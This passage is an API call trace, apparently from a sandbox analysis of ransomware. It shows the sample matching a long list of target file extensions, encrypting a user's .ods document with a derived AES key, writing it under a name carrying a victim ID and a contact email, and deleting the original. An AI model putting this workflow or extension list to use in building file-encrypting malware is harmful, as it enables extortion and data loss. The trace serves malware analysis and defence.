c.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ods") returned=".ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.695] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.695] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.695] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.700] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x150a6, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x150a6, lpOverlapped=0x0) returned 1
	[0188.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.704] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0188.711] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.712] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0188.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.712] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.712] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0188.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.712] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x150a6, dwBufLen=0x150a6 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x150b0) returned 1
	[0188.715] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.715] RtlMoveMemory (in: Destination=0xff2230, Source=0xfdd180, Length=0x150a6 | out: Destination=0xff2230) 
	[0188.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.716] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2230*, pdwDataLen=0x18a1ec*=0x150a6, dwBufLen=0x150b0 | out: pbData=0xff2230*, pdwDataLen=0x18a1ec*=0x150b0) returned 1
	[0188.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.718] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0188.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.719] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0188.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.719] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0188.719] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.719] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.720] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.720] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0188.727] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 127
	[0188.727] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0188.727] WriteFile (in: hFile=0x390, lpBuffer=0xff2230*, nNumberOfBytesToWrite=0x150b0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff2230*, lpNumberOfBytesWritten=0x18a648*=0x150b0, lpOverlapped=0x0) returned 1
	[0188.734] CloseHandle (hObject=0x390) returned 1
	[0188.734] CloseHandle (hObject=0x388) returned 1
	[0188.734] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods")) returned 1
	[0188.845] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\3sc2nse6i.ods")) returned 0
	[0188.845] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b11f050, ftCreationTime.dwHighDateTime=0x1d96754, ftLastAccessTime.dwLowDateTime=0x1bc2510, ftLastAccessTime.dwHighDateTime=0x1d974f4, ftLastWriteTime.dwLowDateTime=0x1bc2510, ftLastWriteTime.dwHighDateTime=0x1d974f4, nFileSizeHigh=0x0, nFileSizeLow=0x15d10, dwReserved0=0x0, dwReserved1=0x0, cFileName="9WRYc98W.rtf", cAlternateFileName="")) returned 1
	[0188.845] lstrcmpW (lpString1="9WRYc98W.rtf", lpString2="..") returned 1
	[0188.845] lstrcmpW (lpString1="9WRYc98W.rtf", lpString2=".") returned 1
	[0188.845] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.845] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="9WRYc98W.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\9WRYc98W.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\9WRYc98W.rtf"
	[0188.845] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\9WRYc98W.rtf") returned 84
	[0188.846] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.852] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\9WRYc98W.rtf", cchLength=0x54 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf") returned 0x54
	[0188.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.852] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.852] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf"
	[0188.853] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf") returned 84
	[0188.853] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.853] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0188.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.853] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") 